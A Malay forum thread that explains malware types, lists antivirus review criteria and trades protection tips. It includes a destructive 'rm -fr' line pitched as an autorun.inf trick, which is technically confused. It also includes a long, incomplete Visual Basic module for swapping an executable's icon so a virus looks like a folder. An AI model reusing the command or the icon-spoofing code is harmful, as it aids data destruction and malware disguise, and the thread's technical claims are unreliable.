Kenali Virus Komputer | citer-citer tentang virus komputer....

Virus Komputer


Trojan, Worm dan Hijacker

o Trojan adalah replika atau salinan virus. Ia dimasukkan sebagai virus kerana sifat program yang tidak diinginkan dan bekerja dengan sendiri pada sesebuah computer dan mengawalnya secara automatic.
o Worm atau cacing internet berfungsi melakukan serangan dan menyebar serta mengambil data dan mengirim e-mail secara diam tanpa diketahui pemiliknya.
o Hijacker pula memasuki fungsi browser computer dan mengawalnya mengikut kemahuannya.
Spyware
o Adalah program yang secara diam masuk ke dalam computer dan bertindak seperti mata-mata seterusnya mengambil data. Pada awalnya, spyware tidak berbahaya kerana berfungsi sebagai mata-mata kepada computer seseorang yang dikunjunginya.
o Namun, ia kini menjadi sebaliknya apabila digunakan oleh mereka yang tidak bertanggungjawab yang singgah ke computer dan mencuri data peribadi orang lain.
Adware
o Berfungsi sebagai tapak promosi atau iklan berbentuk banner. Ia juga pada peringkat awal tidak berbahaya, tetapi penciptanya kini mengambil terlalu banyak jalur lebar dan dan menyebabkan sambungan internet menjadi lembap.
o Sekiranya ia memasuki computer terlalu banyak, ia juga boleh menyerang windows.
Browser Helper Object
o BHO adalah virus yang menampilkan link pada toolbar. Umumnya BHO bertindak sebagai mata-mata dan mencatat kegiatan pengunjung internet, disamping menambah pelayar anda dengan toolbar khusus.
Browser Hijackers
o Browser akan dimasukkan link tertentu dan memaksa pengguna memasukinya. Ini bermakna program browser secara tidak langsung telah diserang dan diarahkan ke link tertentu.
Keylogger
o Program yang masuk dan mencatat apa yang pengguna layari dan mengirim data ke server pembuat Malware
Retrospies
o Program Malware yang sengaja mematikan anti spyware
Scumware
o Program yang tidak diingini dan masuk ke dalam computer tanpa izin
Search hijackers
o Kawalan yang dilakukan oleh sesebuah enjin pencarian browser. Apabila tersalah menulis alamat, program biasanya menampilkan banyak pop up iklan yang tidak berkaitan.
Surveillance software
o Salah satu program yang berbahaya kerana mencatat kegiatan pada sebuah computer termasuk data penting dan kata laluan. Program ini sangat pintar dan mengirim data setelah seseorang selesai melakukan aktiviti.
Thiefware
o Difungsikan untuk mengarah pengunjung web ke web lain yang mereka kehendaki.

What to look for in Anti-Virus Software
Top anti-virus software should be easy enough for a computer novice to both use and install. The software should effectively seek out and identify virus threats, as well as clean or isolate infected files. There should be understandable reporting available for each scan and plenty of help support available, so you can be well informed of the software�s activities and capabilities. Below are the criteria TopTenREVIEWS used to evaluate anti-virus software.

• Ease of Use �Exceptional anti-virus software is simple to use, regardless of a person�s computer experience or knowledge of viruses.
  
• Effective at Identifying Viruses and Worms � The best anti-virus products identify infected files quickly through real-time scanning, searching for viruses in a multitude of sources, including email, instant message applications, web browsing and so on.
  
• Effective at Cleaning or Isolating Infected Files �Truly capable anti-virus software thoroughly cleans, deletes or quarantines infected files�keeping them from spreading throughout the hard drive or network.
  
• Activity Reporting � Anti-virus programs should give immediate notification of viruses found by real-time scanners and should provide an easy-to-read report of scan results, including what it found and what it did with infected files.
  
• Feature Set � A well-rounded feature set allows anti-virus software to provide absolute protection. The best programs are those that offer a wide variety of tools, from basic real-time scanning to more advanced, heuristic scanning and script blocking�when it comes to virus protection, the more options the better.
  
• Ease of Installation and Setup � Anti-virus programs should be a breeze to install, making it easy to go from installation to initial scan in just a couple clicks of the mouse.
  
• Help Documentation � High-end anti-virus software come with plenty of help, including support via email, online chat or over the telephone. There should also be online resources, such as knowledge bases and FAQs available for quick and convenient help.
  

So, no matter how serious a computer virus is or how quickly it is passed around, with today�s anti-virus software, you�ll always have a cure.

To read our top-ranked anti-virus software review, click here.

pandai aidil pasal computer ek,dulu ada belajar compt ke

adalah sikit-sikit...

good info bro...
ada dengar latest virus 'HOAX'?

ada satu virus baru sedang melanda skrg... flash.10.setup.exe.. ganaz nate ni.. dia akn attack kt komp pnye registry.. jahanam habih la komputer.. jd berhati2 bila cucuk pen drive..

yang penting selalu update antivirus......kalau kat umah tak ada internet update je kat thumdrive pastu balik umah update melalui thumbdrive....

bleh update antivirus gune thumdrive ke bro?

boleh jugak nak update guna pendrive. macam AVG ada option untuk upgrade camni. pegi kat AVG, pegi kat download upgrade. nanti akan dapat file extension ".bin". file tu la yang boleh guna untuk upgrade AVG

gune la RISING ANTIVIRUS FREE EDITION...dh smstinye free dn die enable sume function defences spt brlesen....mmg best....Rising ni ade yg berlesen tp yg tk brlesen ni pun dh cukup best dn tk memeningkn kepale






antivirus ni made in china from beijing.....mmg tk trsenarai dlm the top antivirus in the world...tp function die mmg best....

anti virus avg,bit-defender,avira,norton...dah perna sye guna.masa kini guna kaspersky securty internent 2009...version 8.0.so far tak de problem...
kebanyakan virus diperolehi dari penggunaan internet

yap....tp tk lupe jgk bg penggune2 pendrive.....sbb pendrive la antare punce virus2 ni snang dn cepat merebak....dh mcm STD(Sex Transmited Disease) plak.....so kene la scan dulu pendrive anda sebelum dn selepas gune PC baik PC sendiri mahupun PC kt tmpat kje....

virus? dulu windows ada satu security hole yang paling bahaya. diaorang ingat ia dapat senangkan pengguna dengan tak perlu klik "my computer" bila masukkan cd. lalu dicipta lah apa yang dipanggil "autorun"..
carta aliran autorun:

Code:

masuk media (cd atau pendrive) -> skrip autorun -> pasang program

tapi manusia memang takde had pemikirannya.. lalu ada orang buat camni:

Code:

masuk media -> skrip autorun -> pasang virus

haha! lihatlah betapa senangnya nak buat satu skrip bagi delete folder my document, hanya perlukan 1 baris:

Code:

rm -fr "c:\my documents"

dan save dalam cd sebagai autorun.inf. bukak dan masukkan balik cd, dan lihat my document anda dah hilang.. teruk betul.. hahaha!

ada satu lagi. tengok video ni: https://www.youtube.com/watch?v=oWYigh839gI

akhir kata: disable la autorun.. ia banyak dapat menyelamatkan anda dari anasir2 jahat.. juga hati2 waktu buka my computer, pastikan anda right click dan pilih "Open" bukannya "Autorun.."

AstroCoder.

kebanyakkan virus2 ini ditulis dengan menggunakan bahasa vb (visual basic).dengan ada nya vb maka virus akan di compile sama ada menggunakan native codes yang lain dan seterusnya di assembler menjadi virus yang berbahaya.terpulang dengan penulis virus tersebut bagaimana ia merebakkan dirinya.seperti brontok,ianya menggandakan diri nya melalui flashdisc..

disini saya sertakan contoh script vb iaitu satu codes virus yang selamat iaitu menukar dirinya menjadi ikon folder ataupun ikon yang berbentuk .exe

Code:

Code:

Option Explicit
Public Type IMAGE_DOS_HEADER
Magic As Integer
cblp As Integer
cp As Integer
crlc As Integer
cparhdr As Integer
minalloc As Integer
maxalloc As Integer
ss As Integer
sp As Integer
csum As Integer
ip As Integer
cs As Integer
lfarlc As Integer
ovno As Integer
res(3) As Integer
oemid As Integer
oeminfo As Integer
res2(9) As Integer
lfanew As Long
End Type
Public Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
63
SizeOfOtionalHeader As Integer
Characteristics As Integer
End Type
Public Type IMAGE_DATA_DIRECTORY
DataRVA As Long
DataSize As Long
End Type
Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkVer As Byte
MinorLinkVer As Byte
CodeSize As Long
InitDataSize As Long
unInitDataSize As Long
EntryPoint As Long
CodeBase As Long
DataBase As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOSVer As Integer
MinorOSVer As Integer
MajorImageVer As Integer
MinorImageVer As Integer
MajorSSVer As Integer
MinorSSVer As Integer
Win32Ver As Long
ImageSize As Long
HeaderSize As Long
Checksum As Long
Subsystem As Integer
DLLChars As Integer
StackRes As Long
StackCommit As Long
HeapReserve As Long
HeapCommit As Long
LoaderFlags As Long
RVAsAndSizes As Long
DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type
Public Type IMAGE_SECTION_HEADER
SectionName(7) As Byte
Address As Long
VirtualAddress As Long
SizeOfData As Long
PData As Long
PReloc As Long
PLineNums As Long
RelocCount As Integer
LineCount As Integer
Characteristics As Long
End Type
Type IMAGE_RESOURCE_DIR
Characteristics As Long
TimeStamp As Long
MajorVersion As Integer
MinorVersion As Integer
NamedEntries As Integer
IDEntries As Integer
End Type
Type RESOURCE_DIR_ENTRY
Name As Long
Offset As Long
End Type
Type RESOURCE_DATA_ENTRY
64
Offset As Long
Size As Long
CodePage As Long
Reserved As Long
End Type
Public Type IconDescriptor
ID As Long
Offset As Long
Size As Long
End Type
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any,
Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName
As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes
As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal
hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any,
ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As
Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any,
ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any)
As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal
lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As
Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private SectionAlignment As Long
Private FileAlignment As Long
Private ResSectionRVA As Long
Private ResSectionOffset As Long
Public Function Valid_PE(hfile As Long) As Boolean
Dim Buffer(12) As Byte
Dim lngBytesRead As Long
Dim tDosHeader As IMAGE_DOS_HEADER
If (hfile > 0) Then
ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0&
CopyMemory Buffer(0), tDosHeader.Magic, 2
If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then
SetFilePointer hfile, tDosHeader.lfanew, 0, 0
ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And
(Buffer(3) = 0) Then
Valid_PE = True
Exit Function
End If
End If
End If
Valid_PE = False
End Function
Public Function GetResTreeOffset(hfile As Long) As Long
On Error GoTo ErrHandler:
Dim tDos As IMAGE_DOS_HEADER
Dim tFile As IMAGE_FILE_HEADER
Dim tOptional As IMAGE_OPTIONAL_HEADER
Dim tSections() As IMAGE_SECTION_HEADER
Dim BytesRead As Long
Dim intC As Integer
Dim TreeFound As Boolean
TreeFound = False
If (hfile > 0) Then
SetFilePointer hfile, 0, 0, 0
' Get the offset of the Image File Header
65
ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0&
SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
' Get the Image File Header and the Image Optional Header
ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0&
ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
' Get section headers
ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER
ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections,
BytesRead, ByVal 0&
' Make sure there is a resource tree in this file
If (tOptional.DataEntries(2).DataSize) Then
' Save section alignment and file alignment of image
SectionAlignment = tOptional.SectionAlignment
FileAlignment = tOptional.FileAlignment
' Determine which section contains the resource tree
For intC = 0 To UBound(tSections)
If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _
And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) >
tOptional.DataEntries(2).DataRVA) Then
TreeFound = True
' Save RVA and offset of resource section for future calculations
ResSectionRVA = tSections(intC).VirtualAddress
ResSectionOffset = tSections(intC).PData
' Calculate the physical file offset of the resouce tree
GetResTreeOffset = tSections(intC).PData +
(tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress)
Exit For
End If
Next intC
If Not TreeFound Then
GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1
End If
Exit Function
ErrHandler:
End Function
Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As
IconDescriptor) As Long
On Error GoTo ErrHandler:
Dim Root As IMAGE_RESOURCE_DIR ' Root node of resource tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' 1st level of directory entries
Dim L2Root() As IMAGE_RESOURCE_DIR ' Level 2 resource directories
Dim L2Entries() As RESOURCE_DIR_ENTRY ' 2nd level of directory entries
Dim L3Root() As IMAGE_RESOURCE_DIR ' Level 3 resource directories
Dim L3Entries() As RESOURCE_DIR_ENTRY ' 3rd level of directory entries
Dim DataEntries() As RESOURCE_DATA_ENTRY ' Resource data entries
Dim DIB As DIB_HEADER ' Descriptor for icon images
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim Cursor As Long ' Temp val for setting file pointer
Dim BytesRead As Long ' For ReadFile()
Dim Count As Integer ' Number of icons found
If (hfile > 0) Then
Count = 0
SetFilePointer hfile, ByVal TreeOffset, 0, 0
' Get the root node and begin navigating the resource tree
ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0
ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
' Get first level child nodes
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
66
SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0
ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
If L1Entries(iLvl1).Name = 3 Then
' Jump to level 2 and get directory
' Strip high-order byte from offset
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As
RESOURCE_DIR_ENTRY
For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
' Read second level child nodes
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
' Jump to level 3 and get directory
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DATA_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure
SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0
ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Convert RVA of IconDir structure to file offset and store
Count = Count + 1
ReDim Preserve Icons(Count) As IconDescriptor
Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
' Store ID of icon resource
Icons(Count).ID = L2Entries(iLvl2).Name
' Store Size of icon resource
SetFilePointer hfile, Icons(Count).Offset, 0, 0
ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0&
Icons(Count).Size = DIB.ImageSize + 40
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
Count = 0
End If
' Return the number of icons found
GetIconOffsets = Count
Exit Function
ErrHandler:
End Function
Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _
DIBAttrib As ICON_DIR_ENTRY) As Boolean
On Error GoTo ErrHandler:
Dim Cursor As Long ' File pointer position
Dim Root As IMAGE_RESOURCE_DIR ' Root node of res tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' First-level child nodes
Dim L2Root() As IMAGE_RESOURCE_DIR ' Second-level root nodes
Dim L2Entries() As RESOURCE_DIR_ENTRY ' Second-level child nodes
67
Dim L3Root() As IMAGE_RESOURCE_DIR ' Third-level root nodes
Dim L3Entries() As RESOURCE_DIR_ENTRY ' Third-level child nodes
Dim DataEntries() As RESOURCE_DATA_ENTRY ' IMAGE_RESOURCE_DATA_ENTRY structs
Dim IcoDir As ICON_DIR ' IconDirectory in EXE
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim intC As Integer ' Loop Counter (general)
Dim BytesRead As Long ' Returned by Read/WriteFile API's
If (hfile >= 0) Then
' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures)
DIBOffset = Offset_to_RVA(DIBOffset)
SetFilePointer hfile, ByVal ResTree, 0, 0
ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
' Loop through first-level child nodes and find RT_GROUP_ICON branch
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0
ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
If L1Entries(iLvl1).Name = &HE Then
' RT_GROUP_ICON branch found
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read second-level directory
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to RESOURCE_DATA_ENTRY
CopyMemory Cursor, L3Entries(iLvl3).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY
ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Jump to and read ICON_DIR structure
Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0&
For intC = 1 To IcoDir.Count
WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0&
SetFilePointer hfile, 2, 0, 1
Next intC
Next iLvl3
Next iLvl2
ElseIf L1Entries(iLvl1).Name = 3 Then
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, ByVal Cursor, 0, 0
' Read second-level directory
68
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to and hack the RESOURCE_DATA_ENTRY
Cursor = L3Entries(iLvl3).Offset + ResTree
SetFilePointer hfile, Cursor, 0, 0
WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal
0&
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
HackDirectories = False
Exit Function
End If
HackDirectories = True
Exit Function
ErrHandler:
End Function
Private Function RVA_to_Offset(RVA As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of RVA and start of section
TempOffset = RVA - ResSectionRVA
If (TempOffset >= 0) Then
' Calculate the file offset of the RVA
RVA_to_Offset = ResSectionOffset + TempOffset
Else
RVA_to_Offset = -1
End If
Exit Function
ErrHandler:
End Function
Private Function Offset_to_RVA(Offset As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of Offset and start of section
' Get distance between offset and start of resource section
TempOffset = Offset - ResSectionOffset
If TempOffset >= 0 Then
' Calculate RVA of the file offset
Offset_to_RVA = ResSectionRVA + TempOffset
Else
69
Offset_to_RVA = -1
End If
Exit Function
ErrHandler:
End Function

Ini adalah untuk tujuan pembelajaran sahaja,anda tidak digalakkan untuk mencuba atau mengubahsuai code diatas.

Code-code ini boleh di enskripsi supaya menjadi lebih padat utk meminimakan saiz virus tersebut.

semoga membantu rakan-rakan semua tentang ilmu2 virus ...